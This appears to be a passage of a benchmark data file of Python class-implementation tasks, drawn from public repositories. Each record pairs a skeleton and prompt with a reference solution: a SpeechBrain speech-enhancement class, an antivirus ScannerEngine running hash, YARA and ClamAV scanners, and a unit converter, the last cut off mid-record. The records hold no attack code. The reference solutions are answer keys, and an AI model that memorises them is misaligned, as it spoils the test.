enhancer.enhance_batch(noisy)\"\"\"\n\n def compute_features(self, wavs):\n \"\"\"Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\"\"\"\n <|body_0|>\n\n def enhance_batch(self, noisy, lengths=None):\n \"\"\"Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\"\"\"\n <|body_1|>\n\n def enhance_file(self, filename, output_filename=None):\n \"\"\"Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n feats = self.hparams.compute_stft(wavs)\n feats = self.hparams.spectral_magnitude(feats)\n return torch.log1p(feats)\n<|end_body_0|>\n\n<|body_start_1|>\n noisy = noisy.to(self.device)\n noisy_features = self.compute_features(noisy)\n if lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\n else:\n mask = self.modules.enhance_model(noisy_features)\n enhanced = torch.mul(mask, noisy_features)\n return self.hparams.resynth(torch.expm1(enhanced), noisy)\n<|end_body_1|>\n\n<|body_start_2|>\n noisy = self.load_audio(filename)\n noisy = noisy.to(self.device)\n batch = noisy.unsqueeze(0)\n enhanced = self.enhance_batch(batch)\n if output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\n return enhanced.squeeze(0)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000296", "length_bytes": 35100, "license_type": "permissive", "methods": [{"docstring": "Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.", "name": "compute_features", "signature": "def compute_features(self, wavs)"}, {"docstring": "Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.", "name": "enhance_batch", "signature": "def enhance_batch(self, noisy, lengths=None)"}, {"docstring": "Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.", "name": "enhance_file", "signature": "def enhance_file(self, filename, output_filename=None)"}], "n_methods": 3, "prompt": "Implement the Python class `SpectralMaskEnhancement` described below.\n\nClass description:\nA ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\n\nMethod signatures and docstrings:\n- def compute_features(self, wavs): Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\n- def enhance_batch(self, noisy, lengths=None): Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\n- def enhance_file(self, filename, output_filename=None): Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.", "prompted_full_text": "Implement the Python class `SpectralMaskEnhancement` described below.\n\nClass description:\nA ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\n\nMethod signatures and docstrings:\n- def compute_features(self, wavs): Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\n- def enhance_batch(self, noisy, lengths=None): Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\n- def enhance_file(self, filename, output_filename=None): Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\n\n<|skeleton|>\nclass SpectralMaskEnhancement:\n \"\"\"A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\"\"\"\n\n def compute_features(self, wavs):\n \"\"\"Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\"\"\"\n <|body_0|>\n\n def enhance_batch(self, noisy, lengths=None):\n \"\"\"Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\"\"\"\n <|body_1|>\n\n def enhance_file(self, filename, output_filename=None):\n \"\"\"Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n feats = self.hparams.compute_stft(wavs)\n feats = self.hparams.spectral_magnitude(feats)\n return torch.log1p(feats)\n<|end_body_0|>\n\n<|body_start_1|>\n noisy = noisy.to(self.device)\n noisy_features = self.compute_features(noisy)\n if lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\n else:\n mask = self.modules.enhance_model(noisy_features)\n enhanced = torch.mul(mask, noisy_features)\n return self.hparams.resynth(torch.expm1(enhanced), noisy)\n<|end_body_1|>\n\n<|body_start_2|>\n noisy = self.load_audio(filename)\n noisy = noisy.to(self.device)\n batch = noisy.unsqueeze(0)\n enhanced = self.enhance_batch(batch)\n if output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\n return enhanced.squeeze(0)\n<|end_body_2|>\n", "revision_id": "92acc188d3a0f634de58463b6676e70df83ef808", "skeleton": "<|skeleton|>\nclass SpectralMaskEnhancement:\n \"\"\"A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\"\"\"\n\n def compute_features(self, wavs):\n \"\"\"Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\"\"\"\n <|body_0|>\n\n def enhance_batch(self, noisy, lengths=None):\n \"\"\"Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\"\"\"\n <|body_1|>\n\n def enhance_file(self, filename, output_filename=None):\n \"\"\"Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SpectralMaskEnhancement:\n \"\"\"A ready-to-use model for speech enhancement. Arguments --------- See ``Pretrained``. Example ------- >>> import torchaudio >>> from speechbrain.pretrained import SpectralMaskEnhancement >>> # Model is downloaded from the speechbrain HuggingFace repo >>> tmpdir = getfixture(\"tmpdir\") >>> enhancer = SpectralMaskEnhancement.from_hparams( ... source=\"speechbrain/mtl-mimic-voicebank\", ... savedir=tmpdir, ... ) >>> noisy, fs = torchaudio.load(\"samples/audio_samples/example_noisy.wav\") >>> # Channel dimension is interpreted as batch dimension here >>> enhanced = enhancer.enhance_batch(noisy)\"\"\"\n\n def compute_features(self, wavs):\n \"\"\"Compute the log spectral magnitude features for masking. Arguments --------- wavs : torch.tensor A batch of waveforms to convert to log spectral mags.\"\"\"\n feats = self.hparams.compute_stft(wavs)\n feats = self.hparams.spectral_magnitude(feats)\n return torch.log1p(feats)\n\n def enhance_batch(self, noisy, lengths=None):\n \"\"\"Enhance a batch of noisy waveforms. Arguments --------- noisy : torch.tensor A batch of waveforms to perform enhancement on. lengths : torch.tensor The lengths of the waveforms if the enhancement model handles them. Returns ------- torch.tensor A batch of enhanced waveforms of the same shape as input.\"\"\"\n noisy = noisy.to(self.device)\n noisy_features = self.compute_features(noisy)\n if lengths is not None:\n mask = self.modules.enhance_model(noisy_features, lengths=lengths)\n else:\n mask = self.modules.enhance_model(noisy_features)\n enhanced = torch.mul(mask, noisy_features)\n return self.hparams.resynth(torch.expm1(enhanced), noisy)\n\n def enhance_file(self, filename, output_filename=None):\n \"\"\"Enhance a wav file. Arguments --------- filename : str Location on disk to load file for enhancement. output_filename : str If provided, writes enhanced data to this file.\"\"\"\n noisy = self.load_audio(filename)\n noisy = noisy.to(self.device)\n batch = noisy.unsqueeze(0)\n enhanced = self.enhance_batch(batch)\n if output_filename is not None:\n torchaudio.save(output_filename, enhanced, channels_first=False)\n return enhanced.squeeze(0)\n", "source": "the_stack_v2_python_sparse", "source_path": "ACL_PyTorch/contrib/audio/tdnn/interfaces.py", "source_repo": "Ascend/ModelZoo-PyTorch", "split": "test", "star_events_count": 23} {"blob_id": "10516341a745c5ee11067a8e5b94ac40e3571304", "bodies": ["self.logger = AntiVirusLogger(__name__, debug=debug)\nif config_path is not None:\n self._CONFIG_PATH = config_path\nelse:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\nif file_list:\n self.file_list = file_list\nelse:\n self.file_list = []\nself.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\nself.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\nself.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\nself.process_pool = []", "try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\nexcept KeyboardInterrupt:\n for process in self.process_pool:\n process.terminate()\n return True\nexcept Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True"], "bodies_text": "<|body_start_0|>\n self.logger = AntiVirusLogger(__name__, debug=debug)\n if config_path is not None:\n self._CONFIG_PATH = config_path\n else:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\n if file_list:\n self.file_list = file_list\n else:\n self.file_list = []\n self.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.process_pool = []\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\n except KeyboardInterrupt:\n for process in self.process_pool:\n process.terminate()\n return True\n except Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True\n<|end_body_1|>\n", "class_docstring": "ScannerEngine class.", "class_name": "ScannerEngine", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ScannerEngine:\n \"\"\"ScannerEngine class.\"\"\"\n\n def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):\n \"\"\"Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\"\"\"\n <|body_0|>\n\n def start_scanner_engine(self):\n \"\"\"Start the scanner engine and stat scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = AntiVirusLogger(__name__, debug=debug)\n if config_path is not None:\n self._CONFIG_PATH = config_path\n else:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\n if file_list:\n self.file_list = file_list\n else:\n self.file_list = []\n self.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.process_pool = []\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\n except KeyboardInterrupt:\n for process in self.process_pool:\n process.terminate()\n return True\n except Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000297", "length_bytes": 4932, "license_type": "permissive", "methods": [{"docstring": "Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None", "name": "__init__", "signature": "def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None)"}, {"docstring": "Start the scanner engine and stat scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None", "name": "start_scanner_engine", "signature": "def start_scanner_engine(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006495", "prompt": "Implement the Python class `ScannerEngine` described below.\n\nClass description:\nScannerEngine class.\n\nMethod signatures and docstrings:\n- def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None): Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\n- def start_scanner_engine(self): Start the scanner engine and stat scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None", "prompted_full_text": "Implement the Python class `ScannerEngine` described below.\n\nClass description:\nScannerEngine class.\n\nMethod signatures and docstrings:\n- def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None): Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\n- def start_scanner_engine(self): Start the scanner engine and stat scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None\n\n<|skeleton|>\nclass ScannerEngine:\n \"\"\"ScannerEngine class.\"\"\"\n\n def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):\n \"\"\"Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\"\"\"\n <|body_0|>\n\n def start_scanner_engine(self):\n \"\"\"Start the scanner engine and stat scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = AntiVirusLogger(__name__, debug=debug)\n if config_path is not None:\n self._CONFIG_PATH = config_path\n else:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\n if file_list:\n self.file_list = file_list\n else:\n self.file_list = []\n self.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.process_pool = []\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\n except KeyboardInterrupt:\n for process in self.process_pool:\n process.terminate()\n return True\n except Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True\n<|end_body_1|>\n", "revision_id": "43dec187e5848b9ced8a6b4957b6e9028d4d43cd", "skeleton": "<|skeleton|>\nclass ScannerEngine:\n \"\"\"ScannerEngine class.\"\"\"\n\n def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):\n \"\"\"Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\"\"\"\n <|body_0|>\n\n def start_scanner_engine(self):\n \"\"\"Start the scanner engine and stat scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ScannerEngine:\n \"\"\"ScannerEngine class.\"\"\"\n\n def __init__(self, debug=False, config_path=None, vt_api_key=None, file_list=None):\n \"\"\"Initialize ScannerEngine. Args: debug (bool): Log on terminal or not config_path (str): Configuration JSON file path vt_api_key (str): VirusTotal API Key file_list (list): List of files to scan Raises: None Returns: None\"\"\"\n self.logger = AntiVirusLogger(__name__, debug=debug)\n if config_path is not None:\n self._CONFIG_PATH = config_path\n else:\n self.logger.log('Configuration file path not found.', logtype='error')\n sys.exit(0)\n if file_list:\n self.file_list = file_list\n else:\n self.file_list = []\n self.hash_scanner = HashScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.yara_scanner = YaraScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.clamd_scanner = ClamAVScanner(debug=debug, config_path=self._CONFIG_PATH, file_list=self.file_list, vt_api_key=vt_api_key)\n self.process_pool = []\n\n def start_scanner_engine(self):\n \"\"\"Start the scanner engine and stat scanning the files using three (3) engines in a multi-processing environment. 1. Hash Scanner Engine 2. Yara Scanner Engine 3. Clam AV Scanner Engine Args: None Raises: None Returns: None\"\"\"\n try:\n hash_scanner_process = multiprocessing.Process(target=self.hash_scanner.start_scan)\n yara_scanner_process = multiprocessing.Process(target=self.yara_scanner.start_scan)\n clamd_scanner_process = multiprocessing.Process(target=self.clamd_scanner.start_scan)\n self.process_pool.append(hash_scanner_process)\n self.process_pool.append(yara_scanner_process)\n self.process_pool.append(clamd_scanner_process)\n hash_scanner_process.start()\n self.logger.log('Hash Scanner engine started', logtype='info')\n yara_scanner_process.start()\n self.logger.log('Yara Scanner engine started', logtype='info')\n clamd_scanner_process.start()\n self.logger.log('Clam AV Scanner engine started', logtype='info')\n for process in self.process_pool:\n process.join()\n return True\n except KeyboardInterrupt:\n for process in self.process_pool:\n process.terminate()\n return True\n except Exception as e:\n self.logger.log('Error occurred: ' + str(e), logtype='error')\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "securetea/lib/antivirus/scanner/scanner_engine.py", "source_repo": "rejahrehim/SecureTea-Project", "split": "test", "star_events_count": 1} {"blob_id": "22d16349dc78bfb3a087e493bcc0d4bb6269b084", "bodies": ["self.to_units = to_units\nself.kilo_prefix = kilo_prefix\nself._prefix_conversions = None\nself._bits_to_bytes = None\nself._bytes_to_bits = None\nself.bit_conversions = self.byte_conversions = len(to_units) // 2\nself.bit_units = to_units[:self.bit_conversions]\nself.byte_units = to_units[self.byte_conversions:]\nreturn", "if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\nreturn self._prefix_conversions", "if self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\nreturn self._bits_to_bytes", "if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\nreturn self._bytes_to_bits", "if start_list is None:\n start_list = self.prefix_conversions[0]\nconverter_list = [[conversion_factor * conversion for conversion in start_list]]\nfor previous in range(self.bit_conversions - 1):\n next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\nreturn converter_list", "for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\nfor index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\nreturn"], "bodies_text": "<|body_start_0|>\n self.to_units = to_units\n self.kilo_prefix = kilo_prefix\n self._prefix_conversions = None\n self._bits_to_bytes = None\n self._bytes_to_bits = None\n self.bit_conversions = self.byte_conversions = len(to_units) // 2\n self.bit_units = to_units[:self.bit_conversions]\n self.byte_units = to_units[self.byte_conversions:]\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\n return self._prefix_conversions\n<|end_body_1|>\n\n<|body_start_2|>\n if self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\n return self._bits_to_bytes\n<|end_body_2|>\n\n<|body_start_3|>\n if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\n return self._bytes_to_bits\n<|end_body_3|>\n\n<|body_start_4|>\n if start_list is None:\n start_list = self.prefix_conversions[0]\n converter_list = [[conversion_factor * conversion for conversion in start_list]]\n for previous in range(self.bit_conversions - 1):\n next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\n return converter_list\n<|end_body_4|>\n\n<|body_start_5|>\n for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\n for index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\n return\n<|end_body_5|>\n", "class_docstring": "A creator of unit-conversion dictionaries", "class_name": "BaseConverter", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BaseConverter:\n \"\"\"A creator of unit-conversion dictionaries\"\"\"\n\n def __init__(self, to_units, kilo_prefix):\n \"\"\"base_converter constructor :param: - `to_units`: a list of the units to covert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\"\"\"\n <|body_0|>\n\n def prefix_conversions(self):\n \"\"\"List of lists of prefix conversions\"\"\"\n <|body_1|>\n\n def bits_to_bytes(self):\n \"\"\"List of conversions for bits to bytes\"\"\"\n <|body_2|>\n\n def bytes_to_bits(self):\n \"\"\"list of conversions for bytes to bits\"\"\"\n <|body_3|>\n\n def conversions(self, conversion_factor, start_list=None):\n \"\"\"Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\"\"\"\n <|body_4|>\n\n def build_conversions(self):\n \"\"\"builds the dictionary\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.to_units = to_units\n self.kilo_prefix = kilo_prefix\n self._prefix_conversions = None\n self._bits_to_bytes = None\n self._bytes_to_bits = None\n self.bit_conversions = self.byte_conversions = len(to_units) // 2\n self.bit_units = to_units[:self.bit_conversions]\n self.byte_units = to_units[self.byte_conversions:]\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\n return self._prefix_conversions\n<|end_body_1|>\n\n<|body_start_2|>\n if self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\n return self._bits_to_bytes\n<|end_body_2|>\n\n<|body_start_3|>\n if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\n return self._bytes_to_bits\n<|end_body_3|>\n\n<|body_start_4|>\n if start_list is None:\n start_list = self.prefix_conversions[0]\n converter_list = [[conversion_factor * conversion for conversion in start_list]]\n for previous in range(self.bit_conversions - 1):\n next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\n return converter_list\n<|end_body_4|>\n\n<|body_start_5|>\n for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\n for index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\n return\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000298", "length_bytes": 10932, "license_type": "permissive", "methods": [{"docstring": "base_converter constructor :param: - `to_units`: a list of the units to covert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units", "name": "__init__", "signature": "def __init__(self, to_units, kilo_prefix)"}, {"docstring": "List of lists of prefix conversions", "name": "prefix_conversions", "signature": "def prefix_conversions(self)"}, {"docstring": "List of conversions for bits to bytes", "name": "bits_to_bytes", "signature": "def bits_to_bytes(self)"}, {"docstring": "list of conversions for bytes to bits", "name": "bytes_to_bits", "signature": "def bytes_to_bits(self)"}, {"docstring": "Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists", "name": "conversions", "signature": 